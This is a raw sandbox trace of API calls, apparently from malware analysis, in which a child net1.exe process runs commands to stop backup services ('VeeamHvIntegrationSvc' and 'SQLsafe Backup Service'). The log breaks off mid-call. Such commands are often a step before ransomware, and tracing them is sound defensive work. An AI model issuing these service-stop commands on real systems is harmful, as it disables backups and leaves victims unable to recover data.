[0126.634] WriteFile (in: hFile=0x0, lpBuffer=0x5261a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1cf868, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf868, lpOverlapped=0x0) returned 0 [0126.634] LocalFree (hMem=0x5261a0) returned 0x0 [0126.634] GetFileType (hFile=0x0) returned 0x0 [0126.634] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5261a0 [0126.634] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5261a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nR", lpUsedDefaultChar=0x0) returned 2 [0126.634] WriteFile (in: hFile=0x0, lpBuffer=0x5261a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf868, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf868, lpOverlapped=0x0) returned 0 [0126.634] LocalFree (hMem=0x5261a0) returned 0x0 [0126.634] NetApiBufferFree (Buffer=0x521b00) returned 0x0 [0126.635] NetApiBufferFree (Buffer=0x521b18) returned 0x0 [0126.635] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamHvIntegrationSvc /y" [0126.635] exit (_Code=2) Process: id = "295" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4f5b7000" os_pid = "0x150" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "134" os_parent_pid = "0x324" cmd_line = "C:\\Windows\\system32\\net1 stop “SQLsafe Backup Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 701 os_tid = 0x1238 [0126.193] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27fd5c | out: lpSystemTimeAsFileTime=0x27fd5c*(dwLowDateTime=0x1ef4d810, dwHighDateTime=0x1d6f0d1)) [0126.193] GetCurrentProcessId () returned 0x150 [0126.193] GetCurrentThreadId () returned 0x1238 [0126.193] GetTickCount () returned 0x1152c9d [0126.193] QueryPerformanceCounter (in: lpPerformanceCount=0x27fd54 | out: lpPerformanceCount=0x27fd54*=24529411163) returned 1 [0126.193] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0126.193] __set_app_type (_Type=0x1) [0126.194] __p__fmode () returned 0x770331f4 [0126.194] __p__commode () returned 0x770331fc [0126.194] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0126.194] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0126.194] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0126.194] GetConsoleOutputCP () returned 0x1b5 [0126.194] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0126.194] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.198] sprintf_s (in: _DstBuf=0x27fd14, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0126.198] setlocale (category=0, locale=".437") returned="English_United States.437" [0126.200] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0126.200] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0126.200] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop “SQLsafe Backup Service” /y" [0126.200] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x27fae0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0126.200] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8c) returned 0x5f4ad8 [0126.200] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0126.200] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x27fce4 | out: Buffer=0x27fce4*=0x5f1b10) returned 0x0 [0126.200] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x27fce4 | out: Buffer=0x27fce4*=0x5f1b28) returned 0x0 [0126.200] _fileno (_File=0x77032900) returned -2 [0126.200] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0126.200] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0126.200] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0126.200] _wcsicmp (_String1="config", _String2="stop") returned -16 [0126.201] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0126.201] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0126.201] _wcsicmp (_String1="file", _String2="stop") returned -13 [0126.201] _wcsicmp (_String1="files", _String2="stop") returned -13 [0126.201] _wcsicmp (_String1="group", _String2="stop") returned -12 [0126.201] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0126.201] _wcsicmp (_String1="help", _String2="stop") returned -11 [0126.201] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0126.201] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0126.201] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0126.201] _wcsicmp (_String1="session", _String2="stop") returned -15 [0126.201] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0126.201] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0126.201] _wcsicmp (_String1="share", _String2="stop") returned -12 [0126.201] _wcsicmp (_String1="start", _String2="stop") returned -14 [0126.201] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0126.201] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0126.201] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0126.201] _wcsicmp (_String1="accounts", _String2="“SQLsafe") returned -8123 [0126.201] _wcsicmp (_String1="computer", _String2="“SQLsafe") returned -8121 [0126.201] _wcsicmp (_String1="config", _String2="“SQLsafe") returned -8121 [0126.201] _wcsicmp (_String1="continue", _String2="“SQLsafe") returned -8121 [0126.201] _wcsicmp (_String1="cont", _String2="“SQLsafe") returned -8121 [0126.201] _wcsicmp (_String1="file", _String2="“SQLsafe") returned -8118 [0126.201] _wcsicmp (_String1="files", _String2="“SQLsafe") returned -8118 [0126.201] _wcsicmp (_String1="group", _String2="“SQLsafe") returned -8117 [0126.201] _wcsicmp (_String1="groups", _String2="“SQLsafe") returned -8117 [0126.201] _wcsicmp (_String1="help", _String2="“SQLsafe") returned -8116 [0126.201] _wcsicmp (_String1="helpmsg", _String2="“SQLsafe") returned -8116 [0126.201] _wcsicmp (_String1="localgroup", _String2="“SQLsafe") returned -8112 [0126.201] _wcsicmp (_String1="pause", _String2="“SQLsafe") returned -8108 [0126.201] _wcsicmp (_String1="session", _String2="“SQLsafe") returned -8105 [0126.201] _wcsicmp (_String1="sessions", _String2="“SQLsafe") returned -8105 [0126.202] _wcsicmp (_String1="sess", _String2="“SQLsafe") returned -8105 [0126.202] _wcsicmp (_String1="share", _String2="“SQLsafe") returned -8105 [0126.202] _wcsicmp (_String1="start", _String2="“SQLsafe") returned -8105 [0126.202] _wcsicmp (_String1="stats", _String2="“SQLsafe") returned -8105 [0126.202] _wcsicmp (_String1="statistics", _String2="“SQLsafe") returned -8105 [0126.202] _wcsicmp (_String1="stop", _String2="“SQLsafe") returned -8105 [0126.202] _wcsicmp (_String1="time", _String2="“SQLsafe") returned -8104 [0126.202] _wcsicmp (_String1="user", _String2="“SQLsafe") returned -8103 [0126.202] _wcsicmp (_String1="users", _String2="“SQLsafe") returned -8103 [0126.202] _wcsicmp (_String1="msg", _String2="“SQLsafe") returned -8111 [0126.202] _wcsicmp (_String1="messenger", _String2="“SQLsafe") returned -8111 [0126.202] _wcsicmp (_String1="receiver", _String2="“SQLsafe") returned -8106 [0126.202] _wcsicmp (_String1="rcv", _String2="“SQLsafe") returned -8106 [0126.202] _wcsicmp (_String1="netpopup", _String2="“SQLsafe") returned -8110 [0126.202] _wcsicmp (_String1="redirector", _String2="“SQLsafe") returned -8106 [0126.202] _wcsicmp (_String1="redir", _String2="“SQLsafe") returned -8106 [0126.202] _wcsicmp (_String1="rdr", _String2="“SQLsafe") returned -8106 [0126.202] _wcsicmp (_String1="workstation", _String2="“SQLsafe") returned -8101 [0126.202] _wcsicmp (_String1="work", _String2="“SQLsafe") returned -8101 [0126.202] _wcsicmp (_String1="wksta", _String2="“SQLsafe") returned -8101 [0126.202] _wcsicmp (_String1="prdr", _String2="“SQLsafe") returned -8108 [0126.202] _wcsicmp (_String1="devrdr", _String2="“SQLsafe") returned -8120 [0126.202] _wcsicmp (_String1="lanmanworkstation", _String2="“SQLsafe") returned -8112 [0126.202] _wcsicmp (_String1="server", _String2="“SQLsafe") returned -8105 [0126.202] _wcsicmp (_String1="svr", _String2="“SQLsafe") returned -8105 [0126.202] _wcsicmp (_String1="srv", _String2="“SQLsafe") returned -8105 [0126.202] _wcsicmp (_String1="lanmanserver", _String2="“SQLsafe") returned -8112 [0126.202] _wcsicmp (_String1="alerter", _String2="“SQLsafe") returned -8123 [0126.202] _wcsicmp (_String1="netlogon", _String2="“SQLsafe") returned -8110 [0126.202] _wcsicmp (_String1="accounts", _String2="Backup") returned -1 [0126.203] _wcsicmp (_String1="computer", _String2="Backup") returned 1 [0126.203] _wcsicmp (_String1="config", _String2="Backup") returned 1 [0126.203] _wcsicmp (_String1="continue", _String2="Backup") returned 1 [0126.203] _wcsicmp (_String1="cont", _String2="Backup") returned 1 [0126.203] _wcsicmp (_String1="file", _String2="Backup") returned 4 [0126.203] _wcsicmp (_String1="files", _String2="Backup") returned 4 [0126.203] _wcsicmp (_String1="group", _String2="Backup") returned 5 [0126.203] _wcsicmp (_String1="groups", _String2="Backup") returned 5 [0126.203] _wcsicmp (_String1="help", _String2="Backup") returned 6 [0126.203] _wcsicmp (_String1="helpmsg", _String2="Backup") returned 6 [0126.203] _wcsicmp (_String1="localgroup", _String2="Backup") returned 10 [0126.203] _wcsicmp (_String1="pause", _String2="Backup") returned 14 [0126.203] _wcsicmp (_String1="session", _String2="Backup") returned 17 [0126.203] _wcsicmp (_String1="sessions", _String2="Backup") returned 17 [0126.203] _wcsicmp (_String1="sess", _String2="Backup") returned 17 [0126.203] _wcsicmp (_String1="share", _String2="Backup") returned 17 [0126.203] _wcsicmp (_String1="start", _String2="Backup") returned 17 [0126.203] _wcsicmp (_String1="stats", _String2="Backup") returned 17 [0126.203] _wcsicmp (_String1="statistics", _String2="Backup") returned 17 [0126.203] _wcsicmp (_String1="stop", _String2="Backup") returned 17 [0126.203] _wcsicmp (_String1="time", _String2="Backup") returned 18 [0126.203] _wcsicmp (_String1="user", _String2="Backup") returned 19 [0126.203] _wcsicmp (_String1="users", _String2="Backup") returned 19 [0126.203] _wcsicmp (_String1="msg", _String2="Backup") returned 11 [0126.203] _wcsicmp (_String1="messenger", _String2="Backup") returned 11 [0126.203] _wcsicmp (_String1="receiver", _String2="Backup") returned 16 [0126.203] _wcsicmp (_String1="rcv", _String2="Backup") returned 16 [0126.203] _wcsicmp (_String1="netpopup", _String2="Backup") returned 12 [0126.203] _wcsicmp (_String1="redirector", _String2="Backup") returned 16 [0126.203] _wcsicmp (_String1="redir", _String2="Backup") returned 16 [0126.203] _wcsicmp (_String1="rdr", _String2="Backup") returned 16 [0126.203] _wcsicmp (_String1="workstation", _String2="Backup") returned 21 [0126.203] _wcsicmp (_String1="work", _String2="Backup") returned 21 [0126.203] _wcsicmp (_String1="wksta", _String2="Backup") returned 21 [0126.203] _wcsicmp (_String1="prdr", _String2="Backup") returned 14 [0126.203] _wcsicmp (_String1="devrdr", _String2="Backup") returned 2 [0126.204] _wcsicmp (_String1="lanmanworkstation", _String2="Backup") returned 10 [0126.204] _wcsicmp (_String1="server", _String2="Backup") returned 17 [0126.204] _wcsicmp (_String1="svr", _String2="Backup") returned 17 [0126.204] _wcsicmp (_String1="srv", _String2="Backup") returned 17 [0126.204] _wcsicmp (_String1="lanmanserver", _String2="Backup") returned 10 [0126.204] _wcsicmp (_String1="alerter", _String2="Backup") returned -1 [0126.204] _wcsicmp (_String1="netlogon", _String2="Backup") returned 12 [0126.204] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0126.204] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.636] wcscpy_s (in: _Destination=0x27f7e4, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0126.636] LoadLibraryW (lpLibFileName="neth.dll") returned 0x70040000 [0126.637] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x27f7e0, nSize=0x0, Arguments=0x27f7dc | out: lpBuffer="劸_neth.dll") returned 0xff [0126.638] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0126.638] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0126.638] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0126.638] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0126.638] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0126.638] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0126.638] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0126.638] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0126.638] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0126.638] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0126.638] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0126.638] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0126.638] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0126.638] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0126.639] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0126.639] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0126.639] _wcsicmp (_String1="CONT", _String2="“SQLsafe") returned -8121 [0126.639] _wcsicmp (_String1="CONT", _String2="Backup") returned 1 [0126.639] _wcsicmp (_String1="CONT", _String2="Service”") returned -16 [0126.639] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0126.639] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0126.639] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0126.639] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0126.639] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0126.639] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0126.639] _wcsicmp (_String1="FILES", _String2="“SQLsafe") returned -8118 [0126.639] _wcsicmp (_String1="FILES", _String2="Backup") returned 4 [0126.639] _wcsicmp (_String1="FILES", _String2="Service”") returned -13 [0126.639] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0126.639] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0126.639] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0126.639] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0126.639] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0126.639] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0126.639] _wcsicmp (_String1="GROUPS", _String2="“SQLsafe") returned -8117 [0126.639] _wcsicmp (_String1="GROUPS", _String2="Backup") returned 5 [0126.639] _wcsicmp (_String1="GROUPS", _String2="Service”") returned -12 [0126.639] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0126.639] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0126.639] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0126.639] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0126.639] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0126.639] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0126.639] _wcsicmp (_String1="REPL", _String2="“SQLsafe") returned -8106 [0126.639] _wcsicmp (_String1="REPL", _String2="Backup") returned 16 [0126.639] _wcsicmp (_String1="REPL", _String2="Service”") returned -1 [0126.640] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0126.640] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0126.640] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0126.640] _wcsicmp (_String1="REPLICATOR", _String2="“SQLsafe") returned -8106 [0126.640] _wcsicmp (_String1="REPLICATOR", _String2="Backup") returned 16 [0126.640] _wcsicmp (_String1="REPLICATOR", _String2="Service”") returned -1 [0126.640] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0126.640] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0126.640] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0126.640] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0126.640] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0126.640] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0126.640] _wcsicmp (_String1="SESSIONS", _String2="“SQLsafe") returned -8105 [0126.640] _wcsicmp (_String1="SESSIONS", _String2="Backup") returned 17 [0126.640] _wcsicmp (_String1="SESSIONS", _String2="Service”") returned 1 [0126.640] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0126.640] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0126.640] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0126.640] _wcsicmp (_String1="SESS", _String2="“SQLsafe") returned -8105 [0126.640] _wcsicmp (_String1="SESS", _String2="Backup") returned 17 [0126.640] _wcsicmp (_String1="SESS", _String2="Service”") returned 1 [0126.640] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0126.640] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0126.640] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0126.640] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0126.640] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0126.640] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0126.640] _wcsicmp (_String1="STATS", _String2="“SQLsafe") returned -8105 [0126.640] _wcsicmp (_String1="STATS", _String2="Backup") returned 17 [0126.640] _wcsicmp (_String1="STATS", _String2="Service”") returned 15 [0126.640] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0126.640] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0126.640] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0126.640] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0126.641] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0126.641] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0126.641] _wcsicmp (_String1="USERS", _String2="“SQLsafe") returned -8103 [0126.641] _wcsicmp (_String1="USERS", _String2="Backup") returned 19 [0126.641] _wcsicmp (_String1="USERS", _String2="Service”") returned 2 [0126.641] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0126.641] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0126.641] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0126.641] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0126.641] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0126.641] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0126.641] _wcsicmp (_String1="REDIRECTOR", _String2="“SQLsafe") returned -8106 [0126.641] _wcsicmp (_String1="REDIRECTOR", _String2="Backup") returned 16 [0126.641] _wcsicmp (_String1="REDIRECTOR", _String2="Service”") returned -1 [0126.641] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0126.641] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0126.641] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0126.641] _wcsicmp (_String1="REDIR", _String2="“SQLsafe") returned -8106 [0126.641] _wcsicmp (_String1="REDIR", _String2="Backup") returned 16 [0126.641] _wcsicmp (_String1="REDIR", _String2="Service”") returned -1 [0126.641] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0126.641] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0126.641] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0126.641] _wcsicmp (_String1="RDR", _String2="“SQLsafe") returned -8106 [0126.641] _wcsicmp (_String1="RDR", _String2="Backup") returned 16 [0126.641] _wcsicmp (_String1="RDR", _String2="Service”") returned -1 [0126.641] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0126.641] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0126.641] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0126.641] _wcsicmp (_String1="WORK", _String2="“SQLsafe") returned -8101 [0126.641] _wcsicmp (_String1="WORK", _String2="Backup") returned 21 [0126.641] _wcsicmp (_String1="WORK", _String2="Service”") returned 4 [0126.641] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0126.641] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0126.641] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0126.642] _wcsicmp (_String1="WKSTA", _String2="“SQLsafe") returned -8101 [0126.642] _wcsicmp (_String1="WKSTA", _String2="Backup") returned 21 [0126.642] _wcsicmp (_String1="WKSTA", _String2="Service”") returned 4 [0126.642] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0126.642] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0126.642] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0126.642] _wcsicmp (_String1="PRDR", _String2="“SQLsafe") returned -8108 [0126.642] _wcsicmp (_String1="PRDR", _String2="Backup") returned 14 [0126.642] _wcsicmp (_String1="PRDR", _String2="Service”") returned -3 [0126.642] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0126.642] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0126.642] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0126.642] _wcsicmp (_String1="DEVRDR", _String2="“SQLsafe") returned -8120 [0126.642] _wcsicmp (_String1="DEVRDR", _String2="Backup") returned 2 [0126.642] _wcsicmp (_String1="DEVRDR", _String2="Service”") returned -15 [0126.642] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0126.642] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0126.642] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0126.642] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0126.642] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0126.642] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0126.642] _wcsicmp (_String1="SVR", _String2="“SQLsafe") returned -8105 [0126.642] _wcsicmp (_String1="SVR", _String2="Backup") returned 17 [0126.642] _wcsicmp (_String1="SVR", _String2="Service”") returned 17 [0126.642] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0126.642] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0126.642] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0126.642] _wcsicmp (_String1="SRV", _String2="“SQLsafe") returned -8105 [0126.642] _wcsicmp (_String1="SRV", _String2="Backup") returned 17 [0126.642] _wcsicmp (_String1="SRV", _String2="Service”") returned 13 [0126.642] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0126.642] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x27f7e0, nSize=0x0, Arguments=0x27f7dc | out: lpBuffer="哀_ꔺ盹") returned 0x1c [0126.642] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0126.643] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0126.643] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0126.643] wcstok (in: _String=0x0, 